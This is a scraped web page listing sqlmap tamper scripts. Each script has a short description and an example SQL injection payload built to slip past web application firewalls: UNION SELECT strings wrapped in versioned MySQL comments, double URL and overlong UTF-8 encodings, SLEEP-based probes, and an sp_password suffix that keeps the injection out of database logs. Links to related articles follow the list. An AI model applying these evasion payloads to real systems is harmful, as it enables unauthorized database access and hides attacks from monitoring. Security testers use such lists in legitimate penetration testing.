SQLMap Tamper Scripts Update

apostrophemask.py

Replaces apostrophe character with its UTF-8 full width counterpart

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py

Replaces apostrophe character with its illegal double unicode counterpart

'1 AND %271%27=%271'

appendnullbyte.py

Appends encoded NULL byte character at the end of payload

'1 AND 1=1'

base64encode.py

Base64 all characters in a given payload

'MScgQU5EIFNMRUVQKDUpIw=='

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'

'1 AND A NOT BETWEEN 0 AND B--'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator

'SELECT%09id FROM users where id LIKE 1'

chardoubleencode.py

Double url-encodes all characters in a given payload (not processing already encoded)

'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

commalesslimit.py

Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'

''LIMIT 3 OFFSET 2''

commalessmid.py

Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'

'MID(VERSION() FROM 1 FOR 1)'

concat2concatws.py

Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

charencode.py

Url-encodes all characters in a given payload (not processing already encoded)

'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py

Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)

'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

equaltolike.py

Replaces all occurances of operator equal ('=') with operator 'LIKE'

'SELECT * FROM users WHERE id LIKE 1'

escapequotes.py

Slash escape quotes (' and ")

'1\\\\" AND SLEEP(5)#'

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

'1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py

Adds versioned MySQL comment before each keyword

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

'IF(ISNULL(1),2,1)'

modsecurityversioned.py

Embraces complete query with versioned comment

'1 /*!30874AND 2>1*/--'

modsecurityzeroversioned.py

Embraces complete query with zero-versioned comment

'1 /*!00000AND 2>1*/--'

multiplespaces.py

Adds multiple spaces around SQL keywords

'1 UNION SELECT foobar'

nonrecursivereplacement.py

Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters

'1 UNIOUNIONN SELESELECTCT 2--'

percentage.py

Adds a percentage sign ('%') infront of each character

'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M%T%A%B%L%E'

overlongutf8.py

Converts all characters in a given payload (not processing already encoded)

'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1'

randomcase.py

Replaces each keyword character with random case value

'INseRt'

randomcomments.py

Add random comments to SQL keywords

'I/**/N/**/SERT'

securesphere.py

Appends special crafted string

"1 AND 1=1 and '0having'='0having'"

sp_password.py

Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

'1 AND 9227=9227-- sp_password'

space2comment.py

Replaces space character (' ') with comments '/**/'

'SELECT/**/id/**/FROM/**/users'

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

space2hash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

space2morehash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

space2mssqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Eid%0DFROM%07users'

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')

'1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%A0id%0BFROM%0Cusers'

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

'1--%0AAND--%0A9227=9227'

space2plus.py

Replaces space character (' ') with plus ('+')

'SELECT+id+FROM+users'

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Did%0DFROM%0Ausers'

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

"1 %26%26 '1'='1"

unionalltounion.py

Replaces UNION ALL SELECT with UNION SELECT

'-1 UNION SELECT'

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)

'1%bf%27 AND 1=1-- '

uppercase.py

Replaces each keyword character with upper case value

'INSERT'

varnish.py

Append a HTTP header 'X-originating-IP'

http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

versionedkeywords.py

Encloses each non-function keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

versionedmorekeywords.py

Encloses each keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py

Append a fake HTTP header 'X-Forwarded-For'

' headers["X-Forwarded-For"]'

via

SQLMap Tamper Scripts Update 04/July/2016的更多相关文章

  1. Sqlmap Tamper大全(1)

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  2. 安全工具推荐之sqlmap tamper&sqlmap api

    我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ...

  3. sqlmap tamper脚本

    本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...

  4. sqlmap Tamper脚本编写

    sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ...

  5. Sqlmap Tamper大全

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  6. sqlmap tamper的使用

    前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ...

  7. sqlmap tamper下模块的使用

    使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ...

  8. sqlmap tamper编写

    #!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ...

  9. sqlmap tamper绕过安全狗

    可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (ht ...

随机推荐

  1. SVG动画

    动画原理 SVG动画,就是元素的属性值关于时间的变化. 如下图来说,元素的某个属性值的起始值(from)到结束值(to)在一个时间段(duration)根据时间函数(timing-function)计 ...

  2. ArcGIS Engine开发之书签加载

    ArcGIS中书签是保存特定视图范围的快捷方式.使用书签保存关注的视图范围,可在需要时快速定位.查看与浏览.书签功能主要用到IMapBookmarks.ISpatialBookmark和IAOIBoo ...

  3. ExtPB.Net:窗体应用技巧(2)在树形导航下打开弹出的win窗口

    ExtPB.Net的demo程序有个树形导航菜单,里面的菜单打开的窗口放在右边的TabStrip控件中.我们可以设计win通过导航打开,但有时我们希望以弹出窗口的形式打开它,但怎么办呢?现在可以这样修 ...

  4. 2016总结Android面试题

    1.简单的设计模式:单例模式:在系统中一个类只有一个实例. 分为懒汉模式和饿汉模式.饿汉模式的代码如下:public class Singleten{private static singleten ...

  5. 16-static和extern关键字2-对变量的作用

    上一讲介绍了static和extern对函数的作用,static用来定义一个内部函数,不允许其他文件访问:extern用来定义和声明一个外部函数,允许其他文件访问.static和extern对变量也有 ...

  6. 办公OA的登陆界面..

    <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding= ...

  7. Nginx 访问日志轮询切割

    Nginx 访问日志轮询切割脚本 #!/bin/sh Dateformat=`date +%Y%m%d` Basedir="/application/nginx" Nginxlog ...

  8. WPF 自定义IconButton

    自定义一个按钮控件 按钮控件很简单,我们在项目中有时把样式封装起来,添加依赖属性,也是为了统一. 这里举例,单纯的图标控件怎么设置 1.UserControl界面样式 <UserControl ...

  9. PHP严重致命错误处理:php Fatal error: Cannot redeclare class or function

    1.错误类型:PHP致命错误 Error type: PHP Fatal error Fatal error: Cannot redeclare (a) (previously declared in ...

  10. 阿里云ECS服务器配置(Ubuntu+JAVA+Tomcat+Mysql)

    最近购买了阿里云的ECS服务器,就服务器的安装配置做简要的说明,也方便日后查看. 1.远程操作服务器 远程操作服务器可以使用putty工具,下载地址:http://pan.baidu.com/s/1q ...